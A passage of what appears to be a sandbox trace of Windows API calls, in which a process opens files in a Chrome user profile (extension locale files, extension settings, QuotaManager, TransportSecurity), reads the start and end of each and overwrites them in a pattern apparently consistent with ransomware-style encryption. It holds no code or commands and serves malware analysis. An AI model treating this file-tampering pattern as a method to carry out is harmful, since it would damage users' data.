lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0165.593] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0165.593] WriteFile (in: hFile=0x130, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0165.593] CloseHandle (hObject=0x130) returned 1 [0165.594] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.594] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.595] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3ff2 [0165.595] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.595] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.595] ReleaseMutex (hMutex=0x168) returned 1 [0165.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.595] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.597] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2ff2 [0165.597] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0165.599] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2ff2 [0165.599] WriteFile (in: hFile=0x130, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0165.600] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0165.600] WriteFile (in: hFile=0x130, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0165.601] CloseHandle (hObject=0x130) returned 1 [0165.601] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0165.602] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.602] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x416b [0165.602] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0165.603] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.603] ReleaseMutex (hMutex=0x168) returned 1 [0165.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.603] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.022] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x316b [0166.023] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.024] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x316b [0166.024] WriteFile (in: hFile=0x130, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0166.025] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0166.025] WriteFile (in: hFile=0x130, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0166.025] CloseHandle (hObject=0x130) returned 1 [0166.026] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0166.027] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.027] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3fdc [0166.027] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.027] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.027] ReleaseMutex (hMutex=0x168) returned 1 [0166.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.027] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.029] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2fdc [0166.029] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.030] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2fdc [0166.031] WriteFile (in: hFile=0x130, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0166.032] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0166.032] WriteFile (in: hFile=0x130, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0166.032] CloseHandle (hObject=0x130) returned 1 [0166.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0166.033] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.034] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3e96 [0166.034] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.034] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.034] ReleaseMutex (hMutex=0x168) returned 1 [0166.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.034] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.036] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2e96 [0166.036] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.037] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2e96 [0166.038] WriteFile (in: hFile=0x130, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0166.039] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0166.039] WriteFile (in: hFile=0x130, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0166.039] CloseHandle (hObject=0x130) returned 1 [0166.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0166.041] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.041] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3d11 [0166.041] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.041] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.041] ReleaseMutex (hMutex=0x168) returned 1 [0166.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.042] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.043] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2d11 [0166.044] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.044] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2d11 [0166.045] WriteFile (in: hFile=0x130, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0166.046] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0166.046] WriteFile (in: hFile=0x130, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0166.046] CloseHandle (hObject=0x130) returned 1 [0166.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0166.047] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.047] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xc4 [0166.048] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.048] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.048] ReleaseMutex (hMutex=0x168) returned 1 [0166.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOG", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0166.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOG", cchWideChar=3, lpMultiByteStr=0x1f7ad2c, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOG", lpUsedDefaultChar=0x0) returned 3 [0166.048] ReadFile (in: hFile=0x130, lpBuffer=0x1ee0d28, nNumberOfBytesToRead=0xc4, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0d28*, lpNumberOfBytesRead=0x331f2bc*=0xc4, lpOverlapped=0x0) returned 1 [0166.049] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0166.049] WriteFile (in: hFile=0x130, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x64c, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x331f2d0*=0x64c, lpOverlapped=0x0) returned 1 [0166.050] CloseHandle (hObject=0x130) returned 1 [0166.050] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\QuotaManager" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\quotamanager"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0166.051] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.051] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3c00 [0166.051] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.051] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.051] ReleaseMutex (hMutex=0x168) returned 1 [0166.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuotaManager", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0166.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuotaManager", cchWideChar=12, lpMultiByteStr=0x1f7360c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuotaManager", lpUsedDefaultChar=0x0) returned 12 [0166.051] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.053] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2c00 [0166.053] ReadFile (in: hFile=0x130, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0166.054] SetFilePointer (in: hFile=0x130, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2c00 [0166.054] WriteFile (in: hFile=0x130, lpBuffer=0x25ac1d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac1d8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0166.055] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0166.055] WriteFile (in: hFile=0x130, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0166.056] CloseHandle (hObject=0x130) returned 1 [0166.056] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\transportsecurity"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0166.056] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.057] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x278 [0166.057] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0166.057] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.057] ReleaseMutex (hMutex=0x168) returned 1 [0166.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TransportSecurity", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0166.057] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TransportSecurity", cchWideChar=17, lpMultiByteStr=0x1f88d34, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TransportSecurity", lpUsedDefaultChar=0x0) returned 17 [0166.057] ReadFile (in: hFile=0x130, lpBuffer=0x25ac1f8, nNumberOfBytesToRead=0x278, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25ac1f8*, lpNumberOfBytesRead=0x331f2bc*=0x278, lpOverlapped=0x0) returned 1 [0166.440] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: 